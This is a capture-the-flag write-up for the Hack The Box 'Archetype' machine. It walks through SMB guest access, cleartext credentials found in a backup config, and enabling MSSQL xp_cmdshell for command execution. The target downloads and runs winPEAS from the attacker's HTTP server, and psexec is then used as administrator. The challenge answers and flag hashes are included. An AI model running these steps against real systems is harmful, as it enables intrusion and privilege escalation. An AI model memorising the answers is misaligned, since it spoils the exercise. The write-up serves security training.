Archetype (Tier 2)

Description

  • Tier -> 2

  • Difficult -> Very Easy

  • OS -> Windows

  • Tags -> Protocols / MSSQL / SMB / Powershell / Reconnaissance / Remote Code Execution / Clear Text Credentials / Information Disclosure / Anonymous-Guest Access

https://app.hackthebox.com/starting-point?tier=2

Write-up

  • I started doing an initial port scan using Nmap

nmap 10.129.59.187 -p- -Pn --min-rate 2500 -oN scan.txt

  • With this, I answered the first question

Answer: 1433

  • Then I did an exhaustive scan on the ports found to get information about the services running

nmap 10.129.59.187 -p135,139,445,1433,5985,47001,49664,49666,49667,49668,49669 -sVC -oN serv_scan.txt
snippet

  • I found two interesting services, an SMB server on port 445 and an MS SQL database on port 1433. I started interacting with the SMB service using the smbclient utility and trying to list the shared folders. When asked for the password, I just entered a blank password and it worked successfully listing the shared contents 

smbclient -L 10.129.59.187

To learn more about the SMB protocol you can go here

  • With this, I answered the next question

Answer: backups

  • Then I tried to access these folders and check their content starting with the striking backups folder which didn't have privilege restrictions to access it. Once inside, I listed the contents of the folder and found a file that seemed to be a backup of important information, so, I downloaded it to my machine and closed the connection

smbclient //10.129.59.187/backups
get prod.dstConfig
exit

  • I checked the file content and found important information about the configuration of a product and within it, credentials for a database. These could maybe be for the MS SQL database I running on the machine

  • With this and some research, I answered the next questions

Answer: M3g4c0rp123

Answer: mssqlclient.py

Answer: xp_cmdshell

Answer: WinPEAS

  • To help me to connect to the database I used the Impacket tool kit, using the mssqlclient module to connect to the MS SQL service with the credentials I had found in the previous file. Also, as I knew this was a Windows host, I specified to use this kind of authentication, and after starting the connection, I successfully connected

impacket-mssqlclient ARCHETYPE/sql_svc@10.129.59.187 -windows-auth

  • Once inside, I explored the database but didn't find anything relevant, so next, I checked if it was possible to abuse the xp_cmdshell utility which could let me gain RCE through MS SQL. I tried to execute a command but it told me that the utility was not configured, so I did the proper configuration and after retrying it worked

EXEC xp_cmdshell 'whoami';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';

This reconfiguration will only work if we have high privileges to do it

To learn the complete process for abusing xp_cmdshell you can go here

  • With this, as I could execute system commands I tried to invoke a PowerShell to interact more comfortably with the system. I did a little test using the pwd command to and got a positive response giving us the corresponding output

EXEC xp_cmdshell "powershell -c pwd";

  • So abusing this, I could do an internal file enumeration in the system. I went to the user's Desktop folder and listed its contents, where I found a user.txt file which I read to obtain the user flag

EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Desktop ; dir";
EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Desktop ; Get-Content user.txt";

  • I had to find a way to escalate privileges so to help me with this I tried using WinPEAS to find any path to do the escalation. I imported it successfully, ran it, and after the scan was finished, checked the results which let us know the path to some interesting files that were found

# In our machine
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe   #Get WinPEAS
python3 -m http.server 1234 #On the folder where we have WinPEAS to host it

# In the target machine
EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Desktop ; wget http://10.10.14.117:1234/winPEASx64.exe -outfile winPEASx64.exe"
EXEC xp_cmdshell "powershell -c cd C:\Users\sql_svc\Desktop ; .\winPEASx64.exe"
snippet

  • I observed one of the routes was under the PowerShell installation folder and seemed to be a file related to the history of commands. If I navigated to that route and checked the content of the file, where I found a command for a previous connection to the Administrator user, and also that the corresponding password for this user was being leaked

  • With this and the previously found user flag, I answered the next questions

Answer: ConsoleHost_history.txt

Answer: 3e7b102e78218e935bf3f4951fec21a3

  • Knowing this information, I could try to access the network service on the target with these credentials. For this, Impacket helped me again, this time with the psexec module, and after using it I successfully logged in as a privileged user

impacket-psexec administrator@10.129.59.187

  • Finally, I navigated to the Desktop folder of the Administrator user where I found a root.txt file, and reading its content I retrieved the root flag

  • With this, I got the root flag and pwned the machine

Answer: b91ccec3305e98240082d4474b848528

PreviousTactics (Tier 1)NextOopsie (Tier 2)

Last updated